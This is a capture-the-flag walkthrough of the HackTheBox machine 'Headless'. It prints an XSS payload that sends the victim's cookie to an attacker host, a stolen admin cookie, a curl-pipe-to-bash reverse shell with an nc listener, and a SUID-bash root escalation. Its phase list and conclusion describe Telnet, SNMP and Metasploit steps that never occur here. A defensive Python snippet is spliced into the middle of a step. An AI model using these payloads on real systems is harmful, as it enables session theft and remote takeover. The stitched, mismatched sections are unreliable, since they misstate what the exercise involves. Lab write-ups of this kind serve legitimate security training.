Introduction
In this post, let's see how to solve the CTF machine Headless from HackTheBox. If you have any doubts, comment down below 👇🏾
Hacking Phases in Headless
- Getting into the system initially.
- Checking open TCP ports using Nmap.
- Retrieving information from Telnet banners.
- Looking for vulnerabilities to exploit.
- Enumerating information through SNMP.
- Gaining access to a user shell.
- Obtaining the user flag.
- Escalating privileges.
- Using Metasploit for port forwarding.
- Identifying ways to escalate privileges.
- Exploiting vulnerabilities like file read to gain access.
- Obtaining the root flag.
Let’s Begin
Let’s Hack Headless HTB 😌
Enumeration
Direct link: https://app.hackthebox.com/machines/Headless
Name: Headless
Difficulty: Easy
User points: +20
Root points: +25
OS: Linux
Hi everyone, I want to share a walkthrough of this machine from Season 4, one of the latest. It is based on Linux and rated easy. Here we find a Cross-Site Scripting (XSS) vulnerability that we have to exploit in order to obtain an administrator cookie, access a restricted page, and then establish a connection back to our machine.
User’s Flag:
Let's start the same way as always.
nmap 10.129.131.95 -A -p- -T4
There we find two interesting ports: 22 (SSH) and 5000 (reported by Nmap as upnp, but it serves a web application). So let's visit the target IP address on this port and see what happens.
Let's try to find additional directories in order to gather more information.
dirsearch -u http://10.129.131.95:5000
If we visit the dashboard we are unable to access it, but the support page gives us our opportunity to exploit the application and get access to the machine.
Let's try the following payload:
<img src=x onerror=fetch('http://<YourIP>/?c='+document.cookie);>
And what happens if we submit it?
We successfully confirmed that it's vulnerable to Cross-Site Scripting (XSS). Now we use Burp Suite to send our payload, with a web server listening in Python to catch the response, while trying to access the dashboard page.
Burp Suite:
We have to modify this request, adding our payload at the end of the User-Agent field, separated from the existing value with ";".
I suggest sending it to Repeater (Ctrl+R) and sending it many times, because at first it's hard to get it.
Server:
Just start a simple HTTP server with Python on port 80. I suggest using Python; we could do it with PHP, but I got a better response with Python.
python3 -m http.server 80
After a few minutes we get it!
Finally, here's the admin cookie:
Cookie: ImFkbWluIg.dmzDkZNEm6CK0oyL1fbM-SnXpH0
Now that we have the admin's cookie we are able to visit the dashboard: change the cookie and we get this page.
Now we have to establish a connection with our machine. So let's start a listener with netcat:
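From a defender's point of view, the two things this walkthrough relies on are the support form rendering the User-Agent header into a page the administrator views, and the session cookie being readable from document.cookie. The following Python example is added here and is not code from the original post or from the machine; it shows a verbatim rendering beside an escaped one, a parser-based check for tags that came from the input, and a Set-Cookie builder with the HttpOnly flag. The cookie name "session" and the listener host are constructed values.

```python
import html
from html.parser import HTMLParser
from http.cookies import SimpleCookie

# Constructed sample input: the payload from the walkthrough, with the page's
# "<YourIP>" placeholder replaced by a made-up listener host.
XSS_USER_AGENT = ("<img src=x onerror=fetch('http://listener.example/?c='"
                  "+document.cookie);>")


def render_report_vulnerable(user_agent: str) -> str:
    """Insert the User-Agent header into the admin report verbatim: any
    markup in it becomes live HTML when the administrator opens the page."""
    return f"<tr><td>User-Agent</td><td>{user_agent}</td></tr>"


def render_report_hardened(user_agent: str) -> str:
    """Escape the header value first, so the browser shows it as text."""
    safe = html.escape(user_agent, quote=True)
    return f"<tr><td>User-Agent</td><td>{safe}</td></tr>"


class _TagCollector(HTMLParser):
    """Record every start tag a browser would see in a fragment."""
    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        self.tags.append(tag)


def injected_tags(rendered: str, template_tags=("tr", "td")) -> list[str]:
    """Tags in the rendered fragment that the template itself did not emit;
    anything listed here came from request-controlled input."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return [t for t in parser.tags if t not in template_tags]


def set_cookie_header(value: str, http_only: bool = True) -> str:
    """Set-Cookie value for a constructed cookie named 'session'. With HttpOnly
    set, document.cookie no longer exposes it, which the payload depends on."""
    jar = SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = http_only
    jar["session"]["samesite"] = "Strict"
    return jar.output(header="").strip()
```

Escaping stops the header from becoming markup, and HttpOnly removes the cookie from what any injected script can read; both fixes are independent and worth applying together.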
nc -lvnp 9000
If we intercept the request and try to establish a connection directly with our machine, we don't get the right answer.
But what happens if we curl our machine and execute the result with bash?
curl http://<YourIP>/shell.sh|bash
If we look at our nc listener…
We are in!
Root’s Flag:
Let's see what we are able to do.
If we cat the file and analyse it, we find that it works with a file named "initdb.sh".
Okay, we can create that file so that it changes the permissions of bash, setting the SUID (user) bit, and then run syscheck.
Finally, run bash:
/bin/bash -p
Cat /root/root.txt and that's all.
Conclusion
This device offered an enjoyable and educational journey, during which we explored a range of topics such as TCP port scanning, service enumeration, UDP port scanning, SNMP enumeration, exploiting password disclosure vulnerabilities, port forwarding using Metasploit, manual port forwarding, file transfer, understanding file permissions, and exploiting file read vulnerabilities to retrieve the root.txt file through two distinct methods.
FAQs
- What is HacktheBox?
- HacktheBox is an online platform that offers a range of virtual machines for users to practice their penetration testing skills in a legal and controlled environment.
- What is “Headless” on HacktheBox?
- “Headless” refers to one of the machines available on HacktheBox, presenting users with various cybersecurity challenges to overcome.
- How do you obtain the user flag?
- Obtaining the user flag involves exploring the compromised system to locate the designated file containing the flag. This often requires executing commands and navigating through directories.
- What is privilege escalation?
- Privilege escalation is the process of gaining higher levels of access on a system than initially granted. It involves exploiting vulnerabilities or misconfigurations to elevate privileges.
- How do you escalate privileges in a hack?
- Privilege escalation can be achieved by exploiting vulnerabilities such as misconfigured services, weak file permissions, or known software vulnerabilities.